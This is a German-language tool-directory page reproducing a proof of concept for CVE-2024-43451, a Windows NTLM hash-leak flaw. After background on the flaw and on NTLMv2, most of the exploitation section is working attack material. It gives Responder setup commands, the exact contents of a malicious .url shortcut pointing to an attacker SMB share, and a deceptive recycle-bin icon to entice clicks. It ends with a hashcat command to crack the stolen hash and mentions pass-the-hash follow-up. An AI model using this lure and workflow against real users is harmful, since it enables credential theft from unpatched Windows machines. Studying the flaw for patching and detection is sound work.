Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ronf98/cve-2024-43451-poc
Passwort-CrackingSchwachstellenanalyseExploitationPost-ExploitationPhishingMalware-Analyse
GitHubronf98/cve-2024-43451-poc

CVE-2024-43451-POC

CVE-2024-43451 ist eine Windows-NTLM-Sicherheitslücke, die es einem Angreifer ermöglicht, Authentifizierung zu erzwingen und NTLM-Hashes mittels bösartiger Verknüpfungen zu erfassen.

Repository anzeigen
1513vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beschreibung

  • Name : CVE-2024-43451
  • CVSSv3-Bewertung : 6.5
  • Betroffene Versionen : Alle Microsoft Windows-Versionen vor dem November 2024 Patch

CVE-2024-43451 ist eine Zero-Day-Sicherheitslücke in Microsoft Windows, die Angreifern ermöglicht, NTLMv2-Passwort-Hashes mit minimaler Benutzerinteraktion zu erfassen, was potenziell zum Diebstahl von Anmeldedaten führen kann. Eine häufig ausgenutzte Methode besteht darin, die NTLM-Authentifizierung über SMB-Verbindungen zu einem entfernten Server zu nutzen, um den Hash zu erfassen. Diese Sicherheitslücke wurde in den Updates vom November 2024 behoben. Benutzern wird empfohlen, die entsprechenden Sicherheitsupdates anzuwenden, um das Risiko zu mindern.

Dieser Angriff wurde entdeckt, als er aktiv über eine Phishing-E-Mail ausgenutzt wurde, die von einem kompromittierten ukrainischen Regierungsserver gesendet wurde. Die E-Mail enthält eine bösartige URL-Datei. Wenn der Benutzer mit der Datei interagiert, indem er sie mit der rechten Maustaste anklickt, löscht oder verschiebt, wird die Sicherheitslücke aktiviert. Dies löst eine Verbindung zum Server des Angreifers aus, was zum Herunterladen weiterer schädlicher Dateien führt, wie z. B. der SparkRAT-Malware (ein Open-Source-Remote-Zugriffstrojaner, der dem Angreifer die Kontrolle über das System des Opfers ermöglicht).

NTLM-Authentifizierung

NTLMv2 ist derzeit die sicherste Version und heute am relevantesten.

  • Der Client verbindet sich mit dem Server und fordert Zugriff auf eine Ressource an.
  • Der Server generiert eine Nonce (eine zufällige 16-Byte-Herausforderung) und sendet sie an den Client.
  • Der Client sendet eine Antwort, die mit dem HMAC-MD5-Algorithmus generiert wird und den Passwort-Hash (unter Verwendung des NT-Hash-Algorithmus), Server-Nonce, Zeitstempel, Client-Nonce und mehr enthält.
  • Der Server verwendet den NT-Hash und wiederholt dieselben Berechnungen für sich selbst, um seine eigene NTLM-Antwort zu erzeugen. Sobald beide ihre eigene Antwort haben, können sie sie vergleichen.
  • Nach dem Vergleich entscheidet der Server, ob die Verbindung akzeptiert oder abgelehnt wird.

image

Ausnutzung

POC-Einrichtung

Um eine funktionierende Umgebung für diesen POC zu schaffen, müssen wir eine Ziel-Windows-Maschine mit einer Build-Nummer, die vor November 2024 veröffentlicht wurde, und einen entfernten Server zum Simulieren des Hash-Einfangs einrichten:

  1. Laden Sie Responder herunter und installieren Sie es, um den Hash über SMB zu erfassen:
    root@kitploit:~
    brew install python3
    
    root@kitploit:~
    git clone https://github.com/lgandx/Responder.git
    
    root@kitploit:~
    cd Responder
    
    root@kitploit:~
    sudo python3 Responder.py -I <put your network interface> -v
    
  2. Stellen Sie sicher, dass eine erfolgreiche Verbindung zwischen der Ziel-Windows-VM und Ihrer entfernten „Hacker“-Umgebung besteht.
  3. Testen Sie die Responder-Einrichtung, indem Sie zum Explorer gehen und \\(remote server IP) eingeben:

image

Erstellen des Exploits

Da der Exploit lediglich eine SMB-Verbindung zum entfernten Server herstellen muss, können wir eine einfache Datei verwenden, um dies zu simulieren:

  1. Öffnen Sie Notepad
  2. Geben Sie Folgendes ein:
    Sie können jedes Symbol eingeben, das den Benutzer zur Interaktion verleitet. Ich habe das Symbol „voller Papierkorb“ (32) verwendet.
    root@kitploit:~
    [InternetShortcut]
    URL=\\(remote server IP)\share
    IconIndex=32                    
    IconFile=C:\Windows\System32\shell32.dll
    
  3. Speichern Sie es als (name).url

Aktivierungsprozess

Sobald die Datei vorbereitet und an das Zielsystem übergeben wurde, erfordert das Stehlen des Hashs nur minimale Benutzerinteraktion. Diese Interaktion kann eine der folgenden Aktionen umfassen:

  • Herunterladen der Datei und Zugriff auf den Ordner „Downloads“
  • Rechtsklick auf die Datei
  • Verschieben der Datei in einen anderen Ordner

https://github.com/user-attachments/assets/fd6389b5-4ee9-4d90-a76e-562394b24058

https://github.com/user-attachments/assets/b820ea73-b0fc-40f1-920e-28cf7869f1e2

Knacken

Mit dem unverschlüsselten Hash in der Hand können wir entweder versuchen, ihn zu knacken, um das Klartext-Passwort zu enthüllen oder ihn in einem „Pass-the-Hash“-Angriff mit Tools wie Mimikatz oder Metasploit verwenden.

In unserem Fall enthüllt ein einfacher Hashcat-Befehl mein Passwort: hashcat -m 5600 leak.txt rockyou.txt

image

Tool herunterladen